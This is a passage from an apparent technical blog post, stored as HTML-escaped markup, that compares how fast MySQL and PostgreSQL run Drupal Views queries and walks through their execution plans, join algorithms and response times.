              &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;entity_id&lt;/span&gt; 
                 &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;entity_type&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;node&amp;#39;&lt;/span&gt; 
                       &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;deleted&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;0&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
       &lt;span class='k'&gt;LEFT&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt; 
              &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; 
       &lt;span class='k'&gt;LEFT&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data&lt;/span&gt; 
              &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;tid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;tid&lt;/span&gt; 
&lt;span class='k'&gt;WHERE&lt;/span&gt;  &lt;span class='p'&gt;((&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;field_image_fid&lt;/span&gt; &lt;span class='k'&gt;IS&lt;/span&gt; &lt;span class='k'&gt;NOT&lt;/span&gt; &lt;span class='k'&gt;NULL&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;1&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;))&lt;/span&gt; 
&lt;span class='k'&gt;GROUP&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data_name&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
          &lt;span class='n'&gt;taxonomy_index_tid&lt;/span&gt; 
&lt;span class='k'&gt;ORDER&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='n'&gt;num_records&lt;/span&gt; &lt;span class='k'&gt;ASC&lt;/span&gt; 
&lt;span class='k'&gt;LIMIT&lt;/span&gt;  &lt;span class='mi'&gt;24&lt;/span&gt; &lt;span class='k'&gt;offset&lt;/span&gt; &lt;span class='mi'&gt;0&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The response time of the query in MySQL versus PostgreSQL is shown in the figure below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/first_query_response_time.png' alt='First query response time results.' /&gt;
&lt;/div&gt;
&lt;p&gt;As seen in the image above, PostgreSQL can execute the query in question in 300 ms or less, whereas MySQL consistently takes 2800 ms to execute it.&lt;/p&gt;

&lt;p&gt;The MySQL execution plan looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: field_data_field_image
         &lt;span class='nb'&gt;type&lt;/span&gt;: ref
possible_keys: PRIMARY,entity_type,deleted,entity_id,field_image_fid
          key: PRIMARY
      key_len: 386
          ref: const
         rows: 19165
        Extra: Using where; Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         &lt;span class='nb'&gt;type&lt;/span&gt;: eq_ref
possible_keys: PRIMARY,node_status_type
          key: PRIMARY
      key_len: 4
          ref: drupal.field_data_field_image.entity_id
         rows: 1
        Extra: Using where
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: users_node
         &lt;span class='nb'&gt;type&lt;/span&gt;: eq_ref
possible_keys: PRIMARY
          key: PRIMARY
      key_len: 4
          ref: drupal.node.uid
         rows: 1
        Extra: Using where; Using index
*************************** 4. row ***************************
           id: 1
  select_type: SIMPLE
        table: taxonomy_index
         &lt;span class='nb'&gt;type&lt;/span&gt;: ref
possible_keys: nid
          key: nid
      key_len: 4
          ref: drupal.field_data_field_image.entity_id
         rows: 1
        Extra: NULL
*************************** 5. row ***************************
           id: 1
  select_type: SIMPLE
        table: taxonomy_term_data
         &lt;span class='nb'&gt;type&lt;/span&gt;: eq_ref
possible_keys: PRIMARY
          key: PRIMARY
      key_len: 4
          ref: drupal.taxonomy_index.tid
         rows: 1
        Extra: NULL
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;MySQL starts from the &lt;code&gt;field_data_field_image&lt;/code&gt; table and, since there are no selective predicates in the query, chooses to scan the table using its &lt;code&gt;PRIMARY&lt;/code&gt; key. It then filters the rows scanned using the &lt;code&gt;field_image_fid IS NOT NULL&lt;/code&gt; predicate. Since MySQL only has one join algorithm, nested loops, it is used to perform the remainder of the joins. A temporary table is created in memory to store the results of these joins. This is then sorted and the result set limited to the 24 rows requested.&lt;/p&gt;

&lt;p&gt;The PostgreSQL execution plan looks drastically different.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt; Limit  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;11712.83..11712.89 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;24 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
   -&amp;gt;  Sort  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;11712.83..11829.24 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;46564 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
         Sort Key: &lt;span class='o'&gt;(&lt;/span&gt;count&lt;span class='o'&gt;(&lt;/span&gt;node.nid&lt;span class='o'&gt;))&lt;/span&gt;
         -&amp;gt;  HashAggregate  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;9946.90..10412.54 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;46564 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
               -&amp;gt;  Hash Left Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;6174.69..9597.67 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;46564 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
                     Hash Cond: &lt;span class='o'&gt;(&lt;/span&gt;taxonomy_index.tid &lt;span class='o'&gt;=&lt;/span&gt; taxonomy_term_data.tid&lt;span class='o'&gt;)&lt;/span&gt;
                     -&amp;gt;  Hash Right Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;6140.19..8922.92 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;46564 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
                           Hash Cond: &lt;span class='o'&gt;(&lt;/span&gt;taxonomy_index.nid &lt;span class='o'&gt;=&lt;/span&gt; node.nid&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Seq Scan on taxonomy_index  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..1510.18 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;92218 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Hash  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;5657.14..5657.14 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;
                                 -&amp;gt;  Hash Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;2030.71..5657.14 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;
                                       Hash Cond: &lt;span class='o'&gt;(&lt;/span&gt;node.nid &lt;span class='o'&gt;=&lt;/span&gt; field_data_field_image.entity_id&lt;span class='o'&gt;)&lt;/span&gt;
                                       -&amp;gt;  Seq Scan on node  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..2187.66 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;76533 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                             Filter: &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 1&lt;span class='o'&gt;)&lt;/span&gt;
                                       -&amp;gt;  Hash  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1547.66..1547.66 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                             -&amp;gt;  Seq Scan on field_data_field_image  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..1547.66 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                                   Filter: &lt;span class='o'&gt;((&lt;/span&gt;field_image_fid IS NOT NULL&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;((&lt;/span&gt;entity_type&lt;span class='o'&gt;)&lt;/span&gt;::text &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;node&amp;#39;&lt;/span&gt;::text&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;deleted&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 0::smallint&lt;span class='o'&gt;))&lt;/span&gt;
                     -&amp;gt;  Hash  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;22.00..22.00 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1000 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Seq Scan on taxonomy_term_data  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..22.00 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1000 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;PostgreSQL has a number of other join algorithms available for use. In particular, for this query, the optimizer has decided that a hash join is the optimal choice.&lt;/p&gt;

&lt;p&gt;PostgreSQL starts by scanning the tiny (1000 rows) &lt;code&gt;taxonomy_term_data&lt;/code&gt; table and constructing an in-memory hash table (the build phase of a hash join). It then probes this hash table for matches of &lt;code&gt;taxonomy_index.tid = taxonomy_term_data.tid&lt;/code&gt; using each row that results from a hash join of &lt;code&gt;taxonomy_index&lt;/code&gt; and &lt;code&gt;node&lt;/code&gt;. That hash join was itself the result of joining the &lt;code&gt;field_data_field_image&lt;/code&gt; and &lt;code&gt;node&lt;/code&gt; tables, with &lt;code&gt;field_data_field_image&lt;/code&gt; used to build a hash table and a sequential scan of &lt;code&gt;node&lt;/code&gt; used to probe it. Aggregation is then performed and the result set is sorted by the aggregated value (in this case a count of node ids). Finally, the result set is limited to 24 rows.&lt;/p&gt;

&lt;p&gt;One neat thing about PostgreSQL is that planner nodes can be disabled. So, to make PostgreSQL execute the query in a similar manner to MySQL, I did:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;drupal&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='nb'&gt;set &lt;/span&gt;&lt;span class='nv'&gt;enable_hashjoin&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;off;
SET
&lt;span class='nv'&gt;drupal&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='nb'&gt;set &lt;/span&gt;&lt;span class='nv'&gt;enable_hashagg&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;off;
SET
&lt;span class='nv'&gt;drupal&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='nb'&gt;set &lt;/span&gt;&lt;span class='nv'&gt;enable_mergejoin&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;off;
SET
&lt;span class='nv'&gt;drupal&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And the execution plan PostgreSQL chose then was:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt; Limit  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;52438.04..52438.10 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;24 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
   -&amp;gt;  Sort  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;52438.04..52552.82 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
         Sort Key: &lt;span class='o'&gt;(&lt;/span&gt;count&lt;span class='o'&gt;(&lt;/span&gt;node.nid&lt;span class='o'&gt;))&lt;/span&gt;
         -&amp;gt;  GroupAggregate  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;50237.67..51155.93 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
               -&amp;gt;  Sort  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;50237.67..50352.45 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
                     Sort Key: taxonomy_term_data.name, taxonomy_index.tid
                     -&amp;gt;  Nested Loop Left Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..46682.48 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Nested Loop Left Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..33783.81 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
                                 -&amp;gt;  Nested Loop  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..18575.38 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;
                                       -&amp;gt;  Seq Scan on field_data_field_image  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..1547.66 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                             Filter: &lt;span class='o'&gt;((&lt;/span&gt;field_image_fid IS NOT NULL&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;((&lt;/span&gt;entity_type&lt;span class='o'&gt;)&lt;/span&gt;::text &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;node&amp;#39;&lt;/span&gt;::text&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;deleted&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 0::smallint&lt;span class='o'&gt;))&lt;/span&gt;
                                       -&amp;gt;  Index Scan using node_pkey on node  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..0.43 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                             Index Cond: &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; field_data_field_image.entity_id&lt;span class='o'&gt;)&lt;/span&gt;
                                             Filter: &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 1&lt;span class='o'&gt;)&lt;/span&gt;
                                 -&amp;gt;  Index Scan using taxonomy_index_nid_idx on taxonomy_index  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..0.36 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;3 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;
                                       Index Cond: &lt;span class='o'&gt;(&lt;/span&gt;node.nid &lt;span class='o'&gt;=&lt;/span&gt; nid&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Index Scan using taxonomy_term_data_pkey on taxonomy_term_data  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..0.27 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
                                 Index Cond: &lt;span class='o'&gt;(&lt;/span&gt;taxonomy_index.tid &lt;span class='o'&gt;=&lt;/span&gt; tid&lt;span class='o'&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above plan takes 2 seconds to execute against PostgreSQL. You can see it is very similar to the MySQL plan: it starts with the &lt;code&gt;field_data_field_image&lt;/code&gt; table and performs nested loop joins to join the remainder of the tables. In this case, an expensive sort must be performed before the aggregation. Using the HashAggregate operator in PostgreSQL would greatly reduce that cost.&lt;/p&gt;

&lt;p&gt;So you can see that, out of the box, PostgreSQL performs much better on this query.&lt;/p&gt;

&lt;h2 id='simple_view'&gt;Simple View&lt;/h2&gt;

&lt;p&gt;I created a simple view that filters and sorts on content criteria. A screenshot of my view construction page can be seen &lt;a href='/images/view_screen_shot.png'&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The resulting SQL query that gets executed by this view is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='k'&gt;SELECT&lt;/span&gt; &lt;span class='k'&gt;DISTINCT&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;title&lt;/span&gt;                            &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;node_title&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt;                              &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;nid&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;comment_count&lt;/span&gt; &lt;span class='k'&gt;AS&lt;/span&gt; 
                &lt;span class='n'&gt;node_comment_statistics_comment_count&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;created&lt;/span&gt;                          &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;node_created&lt;/span&gt; 
&lt;span class='k'&gt;FROM&lt;/span&gt;   &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; 
       &lt;span class='k'&gt;INNER&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt; 
         &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; 
&lt;span class='k'&gt;WHERE&lt;/span&gt;  &lt;span class='p'&gt;((&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;1&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='k'&gt;comment&lt;/span&gt; &lt;span class='k'&gt;IN&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;2&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;&amp;gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;111&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;comment_count&lt;/span&gt; &lt;span class='o'&gt;&amp;gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;2&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;))&lt;/span&gt;
&lt;span class='k'&gt;ORDER&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='n'&gt;node_created&lt;/span&gt; &lt;span class='k'&gt;ASC&lt;/span&gt; 
&lt;span class='k'&gt;LIMIT&lt;/span&gt;  &lt;span class='mi'&gt;50&lt;/span&gt; &lt;span class='k'&gt;offset&lt;/span&gt; &lt;span class='mi'&gt;0&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The response time of the query in MySQL versus PostgreSQL is shown in the figure below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/second_query_response_time.png' alt='Second query response time results.' /&gt;
&lt;/div&gt;
&lt;p&gt;As seen in the image above, PostgreSQL can execute the query in question in 200 ms or less, whereas MySQL can take up to 1000 ms.&lt;/p&gt;

&lt;p&gt;The MySQL execution plan looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         &lt;span class='nb'&gt;type&lt;/span&gt;: index
possible_keys: PRIMARY,node_status_type
          key: node_created
      key_len: 4
          ref: NULL
         rows: 100
        Extra: Using where; Using temporary
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
